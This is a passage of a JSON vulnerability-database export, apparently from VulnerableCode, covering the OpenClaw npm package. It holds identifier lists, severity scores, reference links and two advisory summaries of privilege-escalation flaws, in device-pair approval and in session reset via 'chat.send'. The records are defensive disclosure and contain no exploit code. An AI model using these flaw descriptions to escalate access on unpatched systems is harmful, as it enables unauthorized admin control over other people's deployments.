"vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "GHSA-f275-5h5c-5wg5" ], "risk_score": 4.4, "exploitability": "0.5", "weighted_severity": "8.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k3up-1vdf-2uh9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91677?format=api", "vulnerability_id": "VCID-k52b-966p-ybbk", "summary": "OpenClaw: /pair approve command path omitted caller scope subsetting and reopened device pairing escalation\n## Summary\n\nThe `/pair approve` command path called device approval without forwarding caller scopes into the core approval check.\n\n## Impact\n\nA caller that held pairing privileges but not admin privileges could approve a pending device request asking for broader scopes, including admin access.\n\n## Affected Component\n\n`extensions/device-pair/index.ts, src/infra/device-pairing.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `4ee4960de2` (`Pairing: forward caller scopes during approval`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33579", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.05112", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.05097", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.06183", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33579" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/4ee4960de2330b5322127f925f3687dc6f105be1", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/4ee4960de2330b5322127f925f3687dc6f105be1" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hc5h-pmr3-3497", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:39Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hc5h-pmr3-3497" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33579", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33579" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missing-caller-scope-validation-in-device-pair-approval", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:39Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missing-caller-scope-validation-in-device-pair-approval" }, { "reference_url": "https://github.com/advisories/GHSA-hc5h-pmr3-3497", "reference_id": "GHSA-hc5h-pmr3-3497", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hc5h-pmr3-3497" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-33579", "GHSA-hc5h-pmr3-3497" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-k52b-966p-ybbk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90034?format=api", "vulnerability_id": "VCID-k5da-7tht-w3bs", "summary": "OpenClaw Gateway `operator.write` can reach admin-only session reset via `chat.send` `/reset`\n## Summary\n\nThe `chat.send` path reused command authorization to trigger `/reset` session rotation even though direct session reset is an admin-only control-plane operation.\n\n## Impact\n\nA write-scoped gateway caller could rotate a target session, archive the prior transcript state, and force a new session id without admin scope.\n\n## Affected Component\n\n`src/gateway/server-methods/chat.ts, src/auto-reply/reply/session.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `be00fcfccb` (`Gateway: align chat.send reset scope checks`).", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/be00fcfccba108f88dc3d4380146c6e058770b03", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/be00fcfccba108f88dc3d4380146c6e058770b03" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5r8f-96gm-5j6g", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5r8f-96gm-5j6g" }, { "reference_url": "https://github.com/advisories/GHSA-5r8f-96gm-5j6g", "reference_id": "GHSA-5r8f-96gm-5j6g", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5r8f-96gm-5j6g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": 